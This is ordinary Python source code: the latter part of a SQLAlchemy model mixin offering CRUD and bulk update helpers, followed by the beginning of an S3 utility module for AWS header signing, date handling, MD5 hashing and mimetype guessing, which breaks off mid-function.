                            merge(v, {mapping_col: k}) for k, v in val.items()]
                        kwargs[attr] = {
                            getattr(obj, mapping_col): obj
                            for obj in rel_cls.update_or_new_all(
                                list_of_kwargs=list_of_kwargs,
                                keys=None if rel_cls.allow_updation_based_on_unique_keys else [
                                    rel_cls.primary_key_name()]
                            )}
                elif isinstance(val, dict):
                    # Scalar relationship: dict -> single related instance.
                    rel_cls = cls.mapped_rel_class(attr)
                    if not rel_cls.allow_updation_based_on_unique_keys:
                        val['keys'] = [rel_cls.primary_key_name()]
                    kwargs[attr] = rel_cls.update_or_new(**val)
        for attr in attrs_to_delete:
            del kwargs[attr]
        return kwargs
    @classmethod
    def pre_save_adapter(cls, data, existing_instance=None):
        # Hook for subclasses to massage incoming data before it is applied;
        # the default implementation returns the data unchanged.
        return data
    def clone(self, dict_struct=None, commit=True):
        """Create a copy of this instance as a new row.

        Primary keys are stripped from `dict_struct` (recursively, for any
        relationships it selects) so the ORM assigns fresh keys, then the
        instance is rebuilt from todict() and added via cls.add().
        """
        def remove_primary_keys_from_dict_struct(klass, ds):
            # Recursively drop each class's primary key from the attr lists.
            pk = klass.primary_key_name()
            if "attrs" not in ds:
                ds['attrs'] = list(class_mapper(klass).columns.keys())
            if 'attrs' in ds and pk in ds['attrs']:
                ds['attrs'].remove(pk)
            if 'rels' in ds:
                for rel_name in ds['rels']:
                    mapped_rel = next(
                        r for r in class_mapper(klass).relationships
                        if r.key == rel_name)
                    rel_class = mapped_rel.mapper.class_
                    ds['rels'][rel_name] = remove_primary_keys_from_dict_struct(
                        rel_class, ds['rels'][rel_name])
            return ds

        cls = self.__class__
        if dict_struct is None:
            dict_struct = {}
        dict_struct = remove_primary_keys_from_dict_struct(cls, dict_struct)
        return cls.add(
            cls.new(**self.todict(dict_struct=dict_struct)), commit=commit)
def update(self, **kwargs):
"""Updates an instance.
Args:
**kwargs : Arbitrary keyword arguments. Column names are
keywords and their new values are the values.
Examples:
>>> customer.update(email="newemail@x.com", name="new")
"""
cls = type(self)
kwargs = cls.pre_save_adapter(kwargs, existing_instance=self)
kwargs = self._prepare_data_for_saving(kwargs)
for key, value in six.iteritems(kwargs):
if not hasattr(cls, key) or isinstance(getattr(cls, key), property):
continue
if key not in self._no_overwrite_:
try:
setattr(self, key, value)
except Exception as e:
print(key, value, e.message)
raise
if isinstance(getattr(self, key), OrderingList):
getattr(self, key).reorder()
elif isinstance(getattr(cls, key), AssociationProxyInstance):
target_name = getattr(cls, key).target_collection
target_rel = getattr(self, target_name)
if isinstance(target_rel, OrderingList):
target_rel.reorder()
try:
self.session.commit()
return self
except Exception as e:
self.session.rollback()
raise e
@classmethod
def filter_by(cls, **kwargs):
"""Same as SQLAlchemy's filter_by. Additionally this accepts
two special keyword arguments `limit` and `reverse` for limiting
the results and reversing the order respectively.
Args:
**kwargs: filter parameters
Examples:
>>> user = User.filter_by(email="new@x.com")
>>> shipments = Shipment.filter_by(country="India", limit=3, reverse=True)
"""
limit = kwargs.pop('limit', None)
reverse = kwargs.pop('reverse', False)
q = cls.query.filter_by(**kwargs)
if reverse:
q = q.order_by(cls.id.desc())
if limit:
q = q.limit(limit)
return q
@classmethod
def filter(cls, *criterion, **kwargs):
"""Same as SQLAlchemy's filter. Additionally this accepts
two special keyword arguments `limit` and `reverse` for limiting
the results and reversing the order respectively.
Args:
**kwargs: filter parameters
Examples:
>>> user = User.filter(User.email=="new@x.com")
>>> shipments = Order.filter(Order.price < 500, limit=3, reverse=True)
"""
limit = kwargs.pop('limit', None)
reverse = kwargs.pop('reverse', False)
q = cls.query.filter_by(**kwargs).filter(*criterion)
if reverse:
q = q.order_by(cls.id.desc())
if limit:
q = q.limit(limit)
return q
@classmethod
def count(cls, *criterion, **kwargs):
"""Returns a count of the instances meeting the specified
filter criterion and kwargs.
Examples:
>>> User.count()
500
>>> User.count(country="India")
300
>>> User.count(User.age > 50, country="India")
39
"""
if criterion or kwargs:
return cls.filter(
*criterion,
**kwargs).count()
else:
return cls.query.count()
@classmethod
def all(cls, *criterion, **kwargs):
"""Returns all the instances which fulfil the filtering
criterion and kwargs if any given.
Examples:
>>> Tshirt.all()
[tee1, tee2, tee4, tee5]
>> Tshirt.all(reverse=True, limit=3)
[tee5, tee4, tee2]
>> Tshirt.all(color="Red")
[tee4, tee2]
"""
return cls.filter(*criterion, **kwargs).all()
@classmethod
def first(cls, *criterion, **kwargs):
"""Returns the first instance found of the model class
filtered by the specified criterion and/or key word arguments.
Return None if no result found.
Examples:
>>> will = User.first(name="Will")
"""
return cls.filter(*criterion, **kwargs).first()
@classmethod
def one(cls, *criterion, **kwargs):
"""Similar to `first`. But throws an exception if
no result is found.
Examples:
>>> user = User.one(name="here")
Raises:
NoResultFound: No row was found for one()
"""
return cls.filter(*criterion, **kwargs).one()
@classmethod
def last(cls, *criterion, **kwargs):
"""Returns the last instance matching the criterion and/or
keyword arguments.
Examples:
last_male_user = User.last(gender="male")
"""
kwargs['reverse'] = True
return cls.first(*criterion, **kwargs)
    @classmethod
    def new(cls, **kwargs):
        """Returns a new, unsaved instance of the model class.

        If the mapper is polymorphic and kwargs carry a known value for the
        discriminator column, the instance is built from the matching
        subclass instead of `cls`. In both cases only keys reported by
        `all_settable_keys` are passed to the constructor.
        """
        kwargs = cls.pre_save_adapter(kwargs)
        if cls.__mapper__.polymorphic_on is not None:
            discriminator_key = cls.__mapper__.polymorphic_on.name
            discriminator_val = kwargs.get(discriminator_key)
            if discriminator_val is not None and discriminator_val in cls.__mapper__.polymorphic_map:
                # Dispatch to the concrete subclass mapped to this
                # discriminator value.
                actual_cls = cls.__mapper__.polymorphic_map[discriminator_val].class_
                return actual_cls(
                    **subdict(
                        actual_cls._prepare_data_for_saving(kwargs),
                        actual_cls.all_settable_keys())
                )
        return cls(**subdict(cls._prepare_data_for_saving(kwargs), cls.all_settable_keys()))
    @classmethod
    def add(cls, model, commit=True):
        """Adds a model instance to session and commits the
        transaction.

        Args:
            model: The instance to add.
            commit (bool, optional): If False, the instance is only added
                to the session without committing.

        Raises:
            ValueError: If *model* is not an instance of *cls*.

        Examples:
            >>> customer = Customer.new(name="hari", email="hari@gmail.com")
            >>> Customer.add(customer)
            hari@gmail.com
        """
        if not isinstance(model, cls):
            raise ValueError('%s is not of type %s' % (model, cls))
        cls.session.add(model)
        try:
            if commit:
                cls.session.commit()
            return model
        # Deliberately bare: roll back on *any* failure, then re-raise.
        except:
            cls.session.rollback()
            raise
@classmethod
def add_all(cls, models, commit=True, check_type=False):
"""Batch method for adding a list of model instances
to the db in one get_or_404.
Args:
models (list): A list of the instances to add.
commit (bool, optional): Defaults to True. If False, the
transaction won't get committed.
check_type (bool, optional) : If True, each instance
is type checked and exception is thrown if it is
not an instance of the model. By default, False.
Returns:
list: A list of `Model` instances
"""
if check_type:
for model in models:
if not isinstance(model, cls):
raise ValueError('%s is not of type %s' (model, cls))
if None in models:
cls.session.add_all([m for m in models if m is not None])
else:
cls.session.add_all(models)
try:
if commit:
cls.session.commit()
return models
except:
cls.session.rollback()
raise
    @classmethod
    def _get(cls, key, keyval, user_id=None):
        # Internal lookup: exactly one row where `key == keyval`, optionally
        # scoped to `user_id` when the model has a `user_id` column.
        # Raises (via Query.one) when zero or multiple rows match.
        result = cls.query.filter(
            getattr(cls, key) == keyval)
        if user_id and hasattr(cls, 'user_id'):
            result = result.filter(cls.user_id == user_id)
        return result.one()
    @classmethod
    def get(cls, keyval, key='id', user_id=None):
        """Fetches a single instance which has value `keyval`
        for the attribute `key`.

        Args:
            keyval: The value of the attribute.
            key (str, optional): The attribute to search by. By default,
                it is 'id'.
            user_id: Currently ignored (the scoping code below is disabled).

        Returns:
            A model instance if found. Else None.

        Examples:
            >>> User.get(35)
            user35@i.com
            >>> User.get('user35@i.com', key='email')
            user35@i.com
        """
        if keyval is None:
            return None
        if (key in cls.__table__.columns
                and cls.__table__.columns[key].primary_key):
            # Primary-key lookups go through Query.get (identity-map aware).
            # NOTE(review): user_id scoping is disabled here — confirm intent.
            # if user_id and hasattr(cls, 'user_id'):
            #     return cls.query.filter_by(id=keyval, user_id=user_id).first()
            return cls.query.get(keyval)
        else:
            result = cls.query.filter(
                getattr(cls, key) == keyval)
            # if user_id and hasattr(cls, 'user_id'):
            #     result = result.filter(cls.user_id == user_id)
            return result.first()
    @classmethod
    def get_all(cls, keyvals, key=None):
        """Works like a map function from keyvals to instances.

        Args:
            keyvals(list): The list of values of the attribute.
            key (str, optional): The attribute to search by. By default, it is
                the primary key of the model.

        Returns:
            list: A list of model instances, in the same order as the list of
                keyvals. Keyvals with no matching row map to None.

        Examples:
            >>> User.get_all([2,5,7, 8000, 11])
            user2@i.com, user5@i.com, user7@i.com, None, user11@i.com
            >>> User.get_all(['user35@i.com', 'user5@i.com'], key='email')
            user35@i.com, user5@i.com
        """
        if len(keyvals) == 0:
            return []
        if key is None:
            key = cls.primary_key_name()
        id_attr = getattr(cls, key)
        # Coerce raw values to the column's type so the IN clause and the
        # result mapping below compare consistently.
        keyvals = [cast_as_column_type(v, id_attr) for v in keyvals]
        original_keyvals = keyvals
        # De-duplicate for the IN clause; duplicates are restored from the
        # mapping when building the result list.
        keyvals_set = list(set(keyvals))
        resultset = cls.query.filter(id_attr.in_(keyvals_set))
        # We need the results in the same order as the input keyvals, so map
        # them back in Python rather than relying on SQL ordering.
        key_result_mapping = {
            getattr(result, key): result for result in resultset.all()}
        return [key_result_mapping.get(kv) for kv in original_keyvals]
    @classmethod
    def get_or_404(cls, id):
        """Same as Flask-SQLAlchemy's `get_or_404`: fetch by primary key or
        abort the request with a 404 response.
        """
        return cls.query.get_or_404(id)
    @classmethod
    def create(cls, **kwargs):
        """Initializes a new instance, adds it to the db and commits
        the transaction.

        Args:
            **kwargs: The keyword arguments for the init constructor.

        Examples:
            >>> user = User.create(name="Vicky", email="vicky@h.com")
            >>> user.id
            35
        """
        try:
            return cls.add(cls.new(**kwargs))
        # `add` already rolls back on commit failure; this also covers
        # errors raised while building the instance in `new`.
        except:
            cls.session.rollback()
            raise
    @classmethod
    def find_or_create(cls, **kwargs):
        """Checks if an instance already exists by filtering with the
        kwargs. If yes, returns that instance. If not, creates a new
        instance with kwargs and returns it

        Args:
            **kwargs: The keyword arguments which are used for filtering
                and initialization.
            keys(list, optional): A special keyword argument.
                If passed, only the set of keys mentioned here will be used
                for filtering. Useful when we want to 'find' based on a subset
                of the keys and create with all the keys

        Examples:
            >>> customer = Customer.find_or_create(
            ...     name="vicky", email="vicky@h.com", country="India")
            >>> customer.id
            45
            >>> customer1 = Customer.find_or_create(
            ...     name="vicky", email="vicky@h.com", country="India")
            >>> customer1==customer
            True
            >>> customer2 = Customer.find_or_create(
            ...     name="vicky", email="vicky@h.com", country="Russia")
            >>> customer2==customer
            False
            >>> customer3 = Customer.find_or_create(
            ...     name="vicky", email="vicky@h.com", country="Russia",
            ...     keys=['name', 'email'])
            >>> customer3==customer
            True
        """
        # `keys` is popped so it never reaches the model constructor.
        keys = kwargs.pop('keys') if 'keys' in kwargs else []
        return cls.first(**subdict(kwargs, keys)) or cls.create(**kwargs)
    @classmethod
    def get_updated_or_new_obj(cls, kwargs=None, filter_keys=None):
        """Find an instance by *filter_keys* and update it in memory, or
        build a new (unsaved) instance from *kwargs* when none matches.

        Nothing is committed here; the caller is responsible for adding
        and committing the returned object.
        """
        if filter_keys is None:
            filter_keys = []
        if kwargs is None:
            kwargs = {}
        filter_kwargs = subdict(kwargs, filter_keys)
        if filter_kwargs == {}:
            # An empty filter would match an arbitrary row; treat as "new".
            obj = None
        else:
            obj = cls.first(**filter_kwargs)
        if obj is not None:
            # Update everything except the lookup keys and protected fields.
            update_kwargs = {
                k: v for k, v in six.iteritems(kwargs)
                if k not in filter_keys and k not in cls._no_overwrite_}
            obj.update_without_commit(**update_kwargs)
        else:
            obj = cls.new(**kwargs)
        return obj
    @classmethod
    def get_matching_obj_using_unique_keys(cls, kwargs):
        """Find an existing instance matching *kwargs* via unique identity.

        Tries, in order: the primary key, each single unique column, and
        each multi-column unique constraint. Returns the first match, or
        None when nothing matches.
        """
        primary_key_name = cls.primary_key_name()
        if primary_key_name in kwargs:
            matching_data = subdict(kwargs, [primary_key_name])
            obj = cls.first(**matching_data) if matching_data else None
            if obj:
                return obj
        # Single-column unique keys (the primary key was tried above).
        for k in cls.unique_column_names():
            if k in kwargs and k != primary_key_name:
                matching_data = subdict(kwargs, [k])
                obj = cls.first(**matching_data) if matching_data else None
                if obj:
                    return obj
        # Composite unique constraints: all member columns must be present.
        for col_name_tuple in cls.unique_constraint_col_name_tuples():
            if all(c in kwargs for c in col_name_tuple):
                matching_data = subdict(kwargs, col_name_tuple)
                obj = cls.first(**matching_data) if matching_data else None
                if obj:
                    return obj
        return None
    @classmethod
    def update_matching_obj_or_generate_new_obj(cls, kwargs):
        """Update the instance matched by unique keys, or build a new one.

        Matching uses `get_matching_obj_using_unique_keys`; updates skip
        fields listed in `_no_overwrite_`. Nothing is committed here.
        """
        obj = cls.get_matching_obj_using_unique_keys(kwargs)
        if obj is not None:
            update_kwargs = {
                k: v for k, v in six.iteritems(kwargs)
                if k not in cls._no_overwrite_}
            obj.update_without_commit(**update_kwargs)
        else:
            obj = cls.new(**kwargs)
        return obj
@classmethod
def update_or_new(cls, **kwargs):
keys = kwargs.pop('keys') if 'keys' in kwargs else []
if keys is None or len(keys) == 0:
return cls.update_matching_obj_or_generate_new_obj(kwargs)
return cls.get_updated_or_new_obj(kwargs, keys)
@classmethod
def update_or_new_all(cls, list_of_kwargs, keys=None):
objs = []
if keys is None:
keys = []
if keys is None or len(keys) == 0:
return [
cls.update_matching_obj_or_generate_new_obj(kwargs)
for kwargs in list_of_kwargs
]
for kwargs in list_of_kwargs:
objs.append(cls.get_updated_or_new_obj(kwargs, keys))
return objs
    @classmethod
    def update_or_build(cls, **kwargs):
        """Like `update_or_create`, but without committing.

        Finds an instance by the subset of kwargs named in the special
        ``keys`` argument and updates it in memory, or builds (adds to the
        session uncommitted) a new instance when none matches.
        """
        keys = kwargs.pop('keys') if 'keys' in kwargs else []
        filter_kwargs = subdict(kwargs, keys)
        if filter_kwargs == {}:
            # An empty filter would match an arbitrary row; treat as "new".
            obj = None
        else:
            obj = cls.first(**filter_kwargs)
        if obj is not None:
            for key, value in six.iteritems(kwargs):
                if (key not in keys and
                        key not in cls._no_overwrite_):
                    setattr(obj, key, value)
        else:
            obj = cls.build(**kwargs)
        return obj
    @classmethod
    def update_or_create(cls, **kwargs):
        """Checks if an instance already exists by filtering with the
        kwargs. If yes, updates the instance with new kwargs and
        returns that instance. If not, creates a new
        instance with kwargs and returns it.

        Args:
            **kwargs: The keyword arguments which are used for filtering
                and initialization.
            keys (list, optional): A special keyword argument. If passed,
                only the set of keys mentioned here will be used for filtering.
                Useful when we want to 'filter' based on a subset of the keys
                and create with all the keys.

        Examples:
            >>> customer = Customer.update_or_create(
            ...     name="vicky", email="vicky@h.com", country="India")
            >>> customer.id
            45
            >>> customer1 = Customer.update_or_create(
            ...     name="vicky", email="vicky@h.com", country="India")
            >>> customer1==customer
            True
            >>> customer2 = Customer.update_or_create(
            ...     name="vicky", email="vicky@h.com", country="Russia")
            >>> customer2==customer
            False
            >>> customer3 = Customer.update_or_create(
            ...     name="vicky", email="vicky@h.com", country="Russia",
            ...     keys=['name', 'email'])
            >>> customer3==customer
            True
        """
        keys = kwargs.pop('keys') if 'keys' in kwargs else []
        filter_kwargs = subdict(kwargs, keys)
        if filter_kwargs == {}:
            # An empty filter would match an arbitrary row; treat as "new".
            obj = None
        else:
            obj = cls.first(**filter_kwargs)
        if obj is not None:
            # Update in place, honouring the _no_overwrite_ protection list.
            for key, value in six.iteritems(kwargs):
                if (key not in keys and
                        key not in cls._no_overwrite_):
                    setattr(obj, key, value)
            try:
                cls.session.commit()
            except:
                cls.session.rollback()
                raise
        else:
            obj = cls.create(**kwargs)
        return obj
    @classmethod
    def create_all(cls, list_of_kwargs):
        """Batch method for creating a list of instances

        Args:
            list_of_kwargs(list of dicts): A list of dicts where
                each dict denotes the keyword args that you would pass
                to the create method separately. ``None`` entries are
                passed through as ``None`` in the result.

        Examples:
            >>> Customer.create_all([
            ... {'name': 'Vicky', 'age': 34, 'user_id': 1},
            ... {'name': 'Ron', 'age': 40, 'user_id': 1, 'gender': 'Male'}])
        """
        try:
            return cls.add_all([
                cls.new(**kwargs) if kwargs is not None else None for kwargs in list_of_kwargs])
        except:
            cls.session.rollback()
            raise
@classmethod
def find_or_create_all(cls, list_of_kwargs, keys=[]):
"""Batch method for querying for a list of instances and
creating them if required
Args:
list_of_kwargs(list of dicts): A list of dicts where
each dict denotes the keyword args that you would pass
to the create method separately
keys (list, optional): A list of keys to use for the
initial finding step. Matching is done only on these
attributes.
Examples:
>>> Customer.find_or_create_all([
... {'name': 'Vicky', 'email': 'vicky@x.com', 'age': 34},
... {'name': 'Ron', 'age': 40, 'email': 'ron@x.com',
... 'gender': 'Male'}], keys=['name', 'email'])
"""
list_of_kwargs_wo_dupes, markers = remove_and_mark_duplicate_dicts(
list_of_kwargs, keys)
added_objs = cls.add_all([
cls.first(**subdict(kwargs, keys)) or cls.new(**kwargs)
for kwargs in list_of_kwargs_wo_dupes])
result_objs = []
iterator_of_added_objs = iter(added_objs)
for idx in range(len(list_of_kwargs)):
if idx in markers:
result_objs.append(added_objs[markers[idx]])
else:
result_objs.append(next(
iterator_of_added_objs))
return result_objs
@classmethod
def update_or_create_all(cls, list_of_kwargs, keys=[]):
"""Batch method for updating a list of instances and
creating them if required
Args:
list_of_kwargs(list of dicts): A list of dicts where
each dict denotes the keyword args that you would pass
to the create method separately
keys (list, optional): A list of keys to use for the
initial finding step. Matching is done only on these
attributes.
Examples:
>>> Customer.update_or_create_all([
... {'name': 'Vicky', 'email': 'vicky@x.com', 'age': 34},
... {'name': 'Ron', 'age': 40, 'email': 'ron@x.com',
... 'gender': 'Male'}], keys=['name', 'email'])
"""
objs = []
for kwargs in list_of_kwargs:
filter_kwargs = subdict(kwargs, keys)
if filter_kwargs == {}:
obj = None
else:
obj = cls.first(**filter_kwargs)
if obj is not None:
for key, value in six.iteritems(kwargs):
if (key not in keys and
key not in cls._no_overwrite_):
setattr(obj, key, value)
else:
obj = cls.new(**kwargs)
objs.append(obj)
try:
return cls.add_all(objs)
except:
cls.session.rollback()
raise
@classmethod
def update_or_build_all(cls, list_of_kwargs, keys=[]):
"""Batch method for updating a list of instances and
creating them if required
Args:
list_of_kwargs(list of dicts): A list of dicts where
each dict denotes the keyword args that you would pass
to the create method separately
keys (list, optional): A list of keys to use for the
initial finding step. Matching is done only on these
attributes.
Examples:
>>> Customer.update_or_create_all([
... {'name': 'Vicky', 'email': 'vicky@x.com', 'age': 34},
... {'name': 'Ron', 'age': 40, 'email': 'ron@x.com',
... 'gender': 'Male'}], keys=['name', 'email'])
"""
objs = []
for kwargs in list_of_kwargs:
filter_kwargs = subdict(kwargs, keys)
if filter_kwargs == {}:
obj = None
else:
obj = cls.first(**filter_kwargs)
if obj is not None:
for key, value in six.iteritems(kwargs):
if (key not in keys and
key not in cls._no_overwrite_):
setattr(obj, key, value)
else:
obj = cls.new(**kwargs)
objs.append(obj)
try:
return cls.add_all(objs, commit=False)
except:
cls.session.rollback()
raise
    @classmethod
    def build(cls, **kwargs):
        """Similar to create. But the transaction is not committed

        Args:
            **kwargs : The keyword arguments for the constructor

        Returns:
            A model instance which has been added to db session. But session
            transaction has not been committed yet.
        """
        return cls.add(cls.new(**kwargs), commit=False)
    @classmethod
    def find_or_build(cls, **kwargs):
        """Checks if an instance already exists in db with these kwargs else
        returns a new, saved instance of the service's model class.

        Args:
            **kwargs: instance parameters
            keys (list, optional): Special keyword; when given, only these
                keys are used for the lookup step.
        """
        keys = kwargs.pop('keys') if 'keys' in kwargs else []
        return cls.first(**subdict(kwargs, keys)) or cls.build(**kwargs)
    @classmethod
    def find_or_new(cls, **kwargs):
        """Like `find_or_build`, but a missing instance is only constructed
        (`new`), not added to the session.
        """
        keys = kwargs.pop('keys') if 'keys' in kwargs else []
        return cls.first(**subdict(kwargs, keys)) or cls.new(**kwargs)
    @classmethod
    def new_all(cls, list_of_kwargs):
        """Batch version of `new`: one unsaved instance per kwargs dict."""
        return [cls.new(**kwargs) for kwargs in list_of_kwargs]
@classmethod
def find_or_new_all(cls, list_of_kwargs, keys=[]):
return [cls.first(**subdict(kwargs, keys)) or cls.new(**kwargs) for kwargs in list_of_kwargs]
    @classmethod
    def build_all(cls, list_of_kwargs):
        """Similar to `create_all`. But transaction is not committed.
        """
        return cls.add_all([
            cls.new(**kwargs) for kwargs in list_of_kwargs], commit=False)
    @classmethod
    def find_or_build_all(cls, list_of_kwargs):
        """Similar to `find_or_create_all`. But transaction is not committed.

        NOTE(review): unlike `find_or_create_all`, this filters on ALL the
        kwargs (there is no `keys` subset) — confirm that is intended.
        """
        return cls.add_all([cls.first(**kwargs) or cls.new(**kwargs)
                            for kwargs in list_of_kwargs], commit=False)
    @classmethod
    def update_all(cls, *criterion, **kwargs):
        """Batch method for updating all instances obeying the criterion

        Args:
            *criterion: SQLAlchemy query criterion for filtering what
                instances to update
            **kwargs: The parameters to be updated

        Examples:
            >>> User.update_all(active=True)
            >>> Customer.update_all(Customer.country=='India', active=True)
            The second example sets active=True for all customers with
            country India.
        """
        try:
            # 'fetch' is the synchronize_session strategy: matched rows are
            # fetched so in-session objects reflect the bulk update.
            r = cls.query.filter(*criterion).update(kwargs, 'fetch')
            cls.session.commit()
            return r
        except:
            cls.session.rollback()
            raise
    @classmethod
    def get_and_update(cls, id, **kwargs):
        """Fetches the instance with the given id, applies the updates and
        commits the session.

        Args:
            id: primary key (or whatever `get` accepts) of the instance
            **kwargs: update parameters
        """
        model = cls.get(id)
        for k, v in cls._prepare_data_for_saving(kwargs).items():
            setattr(model, k, v)
        cls.session.commit()
        return model
    @classmethod
    def get_and_setattr(cls, id, **kwargs):
        """Like `get_and_update`, but the session is NOT committed.

        Args:
            id: primary key (or whatever `get` accepts) of the instance
            **kwargs: update parameters
        """
        model = cls.get(id)
        for k, v in cls._prepare_data_for_saving(kwargs).items():
            setattr(model, k, v)
        return model
    @classmethod
    def buckets(cls, bucket_size=None):
        """Delegates to the query's `buckets`, yielding results in chunks of
        *bucket_size*.
        """
        return cls.query.buckets(bucket_size=bucket_size)
| 33.753052 | 102 | 0.556375 |
acdf9b12be2aa2163b5a3f24258aa1896bb98126 | 7,279 | py | Python | sfcsmCtrl/S3/utils.py | chenhui0228/sfcsm | ef9adbc7d2ec8d97cee053678002b65ca41b804b | [
"Apache-2.0"
] | 1 | 2018-06-04T06:26:27.000Z | 2018-06-04T06:26:27.000Z | sfcsmCtrl/S3/utils.py | chenhui0228/sfcsm | ef9adbc7d2ec8d97cee053678002b65ca41b804b | [
"Apache-2.0"
] | null | null | null | sfcsmCtrl/S3/utils.py | chenhui0228/sfcsm | ef9adbc7d2ec8d97cee053678002b65ca41b804b | [
"Apache-2.0"
] | null | null | null | """Misc. S3-related utilities."""
# original work by Ludvig Ericson (https://github.com/lericson/simples3)
# Copyright (c) 2008, Ludvig Ericson
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
# ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import time
import hashlib
import datetime
import mimetypes
from base64 import b64encode
from urllib import quote
from calendar import timegm
def _amz_canonicalize(headers):
    r"""Canonicalize AMZ headers in that certain AWS way.
    >>> _amz_canonicalize({"x-amz-test": "test"})
    'x-amz-test:test\n'
    >>> _amz_canonicalize({"x-amz-first": "test",
    ...                    "x-amz-second": "hello"})
    'x-amz-first:test\nx-amz-second:hello\n'
    >>> _amz_canonicalize({})
    ''
    """
    # Group values by lower-cased header name, keeping only x-amz-* headers.
    amz_headers = {}
    for hdr_name, hdr_value in headers.iteritems():
        hdr_name = hdr_name.lower()
        if hdr_name.startswith("x-amz-"):
            amz_headers.setdefault(hdr_name, []).append(hdr_value)
    # Emit one "name:v1,v2\n" line per header, in sorted header order.
    return "".join("%s:%s\n" % (hdr_name, ",".join(amz_headers[hdr_name]))
                   for hdr_name in sorted(amz_headers))
def metadata_headers(metadata):
    # Map user metadata keys to their "X-AMZ-Meta-<key>" header form.
    return dict(("X-AMZ-Meta-" + h, v) for h, v in metadata.iteritems())
def headers_metadata(headers):
    # Inverse of `metadata_headers`: strip the 11-character "x-amz-meta-"
    # prefix from matching headers to recover the user metadata dict.
    return dict((h[11:], v) for h, v in headers.iteritems()
                if h.lower().startswith("x-amz-meta-"))
# Timestamp format used by S3 listings (always .000 fractional, Zulu time).
iso8601_fmt = '%Y-%m-%dT%H:%M:%S.000Z'
# Parse an ISO-8601 timestamp string into a naive datetime.
def _iso8601_dt(v): return datetime.datetime.strptime(v, iso8601_fmt)
def rfc822_fmtdate(t=None):
    """Format *t* (default: the current UTC time) as an RFC 822 date string."""
    from email.utils import formatdate
    when = datetime.datetime.utcnow() if t is None else t
    return formatdate(timegm(when.timetuple()), usegmt=False)
def rfc822_parsedate(v):
    """Parse an RFC 822 date string into a naive local datetime."""
    from email.utils import parsedate
    parsed_struct = parsedate(v)
    return datetime.datetime.fromtimestamp(time.mktime(parsed_struct))
def expire2datetime(expire, base=None):
    """Force *expire* into a datetime relative to *base*.

    If expire is a relatively small integer, it is assumed to be a delta in
    seconds (possible for deltas up to 10 years). If expire is a timedelta,
    it is added to *base*. If base isn't given, the current time is assumed.

    >>> base = datetime.datetime(1990, 1, 31, 1, 2, 3)
    >>> expire2datetime(base) == base
    True
    >>> expire2datetime(3600 * 24, base=base) - base
    datetime.timedelta(1)
    >>> import time
    >>> expire2datetime(time.mktime(base.timetuple())) == base
    True
    """
    # Already datetime-like (has a timetuple): pass it straight through.
    if hasattr(expire, "timetuple"):
        return expire
    anchor = datetime.datetime.now() if base is None else base
    try:
        # timedelta-like values can simply be added to the anchor.
        return anchor + expire
    except TypeError:
        pass
    # Not addable: interpret values below ~1980 (in epoch seconds) as a
    # delta in seconds, anything larger as a UNIX timestamp. Arbitrary,
    # but gives deltas of up to roughly 10 years.
    unix_eighties = 315529200
    if expire < unix_eighties:
        return anchor + datetime.timedelta(seconds=expire)
    return datetime.datetime.fromtimestamp(expire)
def aws_md5(data):
    """Make an AWS-style MD5 hash (digest in base64).

    *data* may be a byte string or a file-like object; file-like objects
    are hashed in 8 KiB chunks and rewound to the start before and after.
    """
    digester = hashlib.new("md5")
    if hasattr(data, "read"):
        data.seek(0)
        while True:
            piece = data.read(8192)
            if not piece:
                break
            digester.update(piece)
        data.seek(0)
    else:
        digester.update(data)
    return b64encode(digester.digest()).decode("ascii")
def aws_urlquote(value):
    r"""AWS-style quote a URL part.
    >>> aws_urlquote("/bucket/a key")
    '/bucket/a%20key'
    """
    # Encode unicode to UTF-8 bytes first; quote everything except "/".
    if isinstance(value, unicode):
        value = value.encode("utf-8")
    return quote(value, "/")
def guess_mimetype(fn, default="application/octet-stream"):
    """Guess a mimetype from filename *fn*.
    >>> guess_mimetype("foo.txt")
    'text/plain'
    >>> guess_mimetype("foo")
    'application/octet-stream'
    """
    if "." not in fn:
        return default
    stem, extension = fn.lower().rsplit(".", 1)
    # Normalize the common "jpg" spelling to the registered "jpeg" type.
    if extension == "jpg":
        extension = "jpeg"
    guessed, _encoding = mimetypes.guess_type("%s.%s" % (stem, extension))
    return guessed or default
def info_dict(headers):
    """Summarize HTTP response *headers* into a convenience dict.

    Always contains 'headers' (the raw mapping) and 'metadata' (the
    x-amz-meta-* values); adds 'size', 'mimetype', 'date' and 'modify'
    when the corresponding headers are present.
    """
    rv = {"headers": headers, "metadata": headers_metadata(headers)}
    if "content-length" in headers:
        rv["size"] = int(headers["content-length"])
    if "content-type" in headers:
        rv["mimetype"] = headers["content-type"]
    if "date" in headers:
        rv["date"] = rfc822_parsedate(headers["date"])
    if "last-modified" in headers:
        rv["modify"] = rfc822_parsedate(headers["last-modified"])
    return rv
def name(o):
    """Find the name of *o*.

    Objects with a ``__name__`` resolve to ``module.name`` (the module part
    is dropped for builtins); anything else resolves via its MRO, using the
    first base class that yields a name.

    >>> name(str), name(object), name(int)
    ('str', 'object', 'int')
    >>> name("Hello"), name(True), name(None), name(Ellipsis)
    ('str', 'bool', 'NoneType', 'ellipsis')
    """
    if hasattr(o, "__name__"):
        modname = getattr(o, "__module__", None)
        # Mirror how Python itself prints names (see typeobject.c,
        # type_repr): builtins get no module prefix. Python only checks
        # for __builtin__ there; "builtins" covers Python 3.
